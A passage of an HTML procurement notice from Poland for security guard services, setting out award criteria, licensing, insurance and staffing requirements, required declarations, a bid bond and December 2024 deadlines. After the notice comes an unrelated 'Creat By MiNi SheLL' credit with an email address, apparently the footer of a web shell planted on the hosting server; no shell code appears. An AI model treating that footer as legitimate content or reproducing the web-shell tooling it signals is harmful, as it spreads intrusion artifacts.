Zamawiający zastrzega możliwości ubiegania się o udzielenie zamówienia publicznego wyłącznie przez Wykonawców, o których mowa w art. 94 ust. 1 pkt. 1) w zw. z art. 266 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-01-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te oferty, które:<br/>a. zostaną złożone przez Wykonawców niewykluczonych przez Zamawiającego z niniejszego postępowania,<br/>b. nie zostaną odrzucone przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ulgi we wpłatach na PEFRON</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 112 ust. 1 p.z.p. dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie przewiduje warunków udziału w postępowaniu w tym zakresie.<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada:<br/>aktualną koncesję Ministra Spraw Wewnętrznych i Administracji wydaną na podstawie ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (j.t. Dz. U. 2021 poz. 1995 z późn. zm.) na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie bezpośredniej ochrony fizycznej wraz ze wszystkimi decyzjami zmieniającymi wydanymi do pierwotnego dokumentu; Koncesja powinna być ważna na okres obowiązywania umowy.<br/><br/>3)	sytuacji ekonomicznej lub finansowej.<br/>Zamawiający uzna, że Wykonawca spełnił niniejszy warunek jeśli Wykonawca będzie posiadał ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 2.000.000,00 zł;<br/>4)	zdolności technicznej lub zawodowej.<br/>Zamawiający uzna, że Wykonawca spełnił niniejszy warunek jeśli wykonawca wykaże, że:<br/>a)	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje należycie co najmniej dwie usługi stałej fizycznej ochrony osób i mienia, przy czym każda usługa była świadczona całodobowo przez nieprzerwany okres co najmniej 12 miesięcy, o wartości każdej z tych usług minimum 100.000 zł brutto.<br/>b)	skieruje do realizacji zamówienia:<br/>	jedną osobę, która będzie uczestniczyć w wykonywaniu zamówienia na stanowisku koordynatora ochrony, posiadającą legitymację kwalifikowanego pracownika ochrony fizycznej (zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t. j. Dz.U z 2021 r. poz. 1995 ze zm.);<br/>	minimum sześciu pracowników którzy będą uczestniczyć w wykonywaniu zamówienia na stanowisku pracownika ochrony.<br/>Uwaga<br/>Osoba wskazana do pełnienia funkcji koordynatora ochrony, o której mowa w ust. 1 pkt 4) lit. b) tiret pierwszy, nie może być jednocześnie osobą pełniącą funkcję pracownika ochrony. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania o którym stanowi art. 125 ust. 1 pzp (w zakresie odnoszącym się do podstaw wykluczenia wskazanych w art. 108 ust. 1 a także w art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2024 r. poz. 507 z późn. zm.) – (wzór oświadczenia stanowi załącznik nr 1 do SWZ).<br/>2)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 p.z.p., o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tj. Dz. U. z 2020 r. poz. 1076, z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (wg wzoru – załącznik nr 2 do SWZ);<br/>3)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 p.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>4)	oświadczenie o aktualności informacji zawartych w oświadczeniu (oświadczeniu wstępnym) składanym na podstawie art. 125 ust. 1 ustawy Pzp (wg wzoru – załącznik nr 5 do SWZ)<br/>5)	dokument potwierdzający status wykonawcy jako zakładu pracy chronionej lub potwierdzający prowadzenie przez wykonawcę lub przez jego wyodrębnioną organizacyjnie jednostkę, która będzie realizowała zamówienie, działalności, której głównym celem jest społeczna i zawodowa integracja osób społecznie marginalizowanych, zgodnie z art. 94 ust. 2 pkt 2) ustawy Pzp;<br/>6)	dokument potwierdzający procentowy wskaźnik zatrudnienia osób niepełnosprawnych w rozumieniu ustawy z dnia 27 sierpnia 1997r. o rehabilitacji zawodowej i społecznej oraz zatrudnienia osób niepełnosprawnych (t. j. Dz. U. z 2024 r. poz. 44 z późn. zm.), zatrudnionych przez zakład pracy chronionej lub wykonawcę lub jego wyodrębnioną organizacyjne jednostkę, która będzie realizowała zamówienie, zgodnie z art. 94 ust. 2 pkt 2) ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	aktualną koncesję (wraz ze wszystkimi zmianami) wydaną przez Ministra Spraw Wewnętrznych i Administracji w zakresie usług ochrony osób i mienia w formie bezpośredniej ochrony fizycznej na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t. j. Dz. U. z 2021 r. poz. 1995 ze zm.);<br/>2)	wykaz wykonanych usług, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wystawione w okresie ostatnich 3 miesięcy (wg wzoru – załącznik nr 3 do SWZ);<br/>3)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wg wzoru – załącznik nr 4 do SWZ);<br/>4)	opłaconą polisę ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 2.000.000,00 zł, w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności;<br/>5)	dokument potwierdzający status wykonawcy jako zakładu pracy chronionej lub potwierdzający prowadzenie przez wykonawcę lub przez jego wyodrębnioną organizacyjnie jednostkę, która będzie realizowała zamówienie, działalności, której głównym celem jest społeczna i zawodowa integracja osób społecznie marginalizowanych, zgodnie z art. 94 ust. 2 pkt 2) ustawy Pzp;<br/>6)	dokument potwierdzający procentowy wskaźnik zatrudnienia osób niepełnosprawnych w rozumieniu ustawy z dnia 27 sierpnia 1997r. o rehabilitacji zawodowej i społecznej oraz zatrudnienia osób niepełnosprawnych (t. j. Dz. U. z 2024 r. poz. 858), zatrudnionych przez zakład pracy chronionej lub wykonawcę lub jego wyodrębnioną organizacyjne jednostkę, która będzie realizowała zamówienie, zgodnie z art. 94 ust. 2 pkt 2) ustawy Pzp.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości 2.000,00 złotych. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 4 i 5 SWZ.<br/>2. Ponadto tacy Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>4. Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, mogą zostać wezwani do przedstawienia Zamawiającemu umowy regulującej ich współpracę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy został przewidziany w § 14 projektu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-23 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com